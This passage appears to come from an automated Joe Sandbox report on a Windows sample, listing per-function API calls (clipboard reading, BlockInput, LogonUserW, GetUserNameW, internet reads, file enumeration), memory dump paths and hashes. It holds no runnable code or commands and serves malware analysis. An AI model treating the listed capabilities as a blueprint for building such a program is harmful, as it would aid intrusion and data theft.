                                                                                                                                              • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                                              • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                                                                                              • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                                              • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                              • IsWindowVisible.USER32 ref: 0047A368
                                                                                                                                              • IsWindowEnabled.USER32 ref: 0047A378
                                                                                                                                              • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                                                                                              • IsIconic.USER32 ref: 0047A393
                                                                                                                                              • IsZoomed.USER32 ref: 0047A3A1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 292994002-0
                                                                                                                                              • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                                                              • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                                                                                              • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                                                              • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 00478442
                                                                                                                                              • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                                                                                              • CoUninitialize.OLE32 ref: 0047863C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                              • String ID: .lnk
                                                                                                                                              • API String ID: 886957087-24824748
                                                                                                                                              • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                                                                              • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                                                                                              • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                                                                              • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                                                                                              APIs
                                                                                                                                              • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                                                              • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                                                              • CloseClipboard.USER32 ref: 0046DD41
                                                                                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                                                              • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                                                              • CloseClipboard.USER32 ref: 0046DD99
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 15083398-0
                                                                                                                                              • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                                                              • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                                                                                              • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                                                              • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                                                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3541575487-0
                                                                                                                                              • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                                                                              • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                                                                                              • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                                                                              • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFind$AttributesCloseFirst
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 48322524-0
                                                                                                                                              • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                                                              • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                                                                                              • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                                                              • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                                                                                              APIs
                                                                                                                                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                                                                                              • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                                                                                                • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 901099227-0
                                                                                                                                              • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                                                                                              • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                                                                                              • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                                                                                              • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                                                                                              APIs
                                                                                                                                              • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Proc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2346855178-0
                                                                                                                                              • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                                                              • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                                                                                              • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                                                              • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                                                                                              APIs
                                                                                                                                              • BlockInput.USER32(00000001), ref: 0045A38B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: BlockInput
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3456056419-0
                                                                                                                                              • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                                                              • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                                                                                              • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                                                              • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                                                                                              APIs
                                                                                                                                              • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LogonUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1244722697-0
                                                                                                                                              • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                                                              • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                                                                                              • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                                                              • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                                                                                              APIs
                                                                                                                                              • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: NameUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2645101109-0
                                                                                                                                              • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                                                              • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                                                                                              • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                                                              • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                                                                                              APIs
                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                              • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                                                              • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                                                                                              • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                                                              • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: N@
                                                                                                                                              • API String ID: 0-1509896676
                                                                                                                                              • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                                              • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                                                                                              • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                                              • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                                                              • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                                                                                              • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                                                              • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                              • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                                                                                              • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                              • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
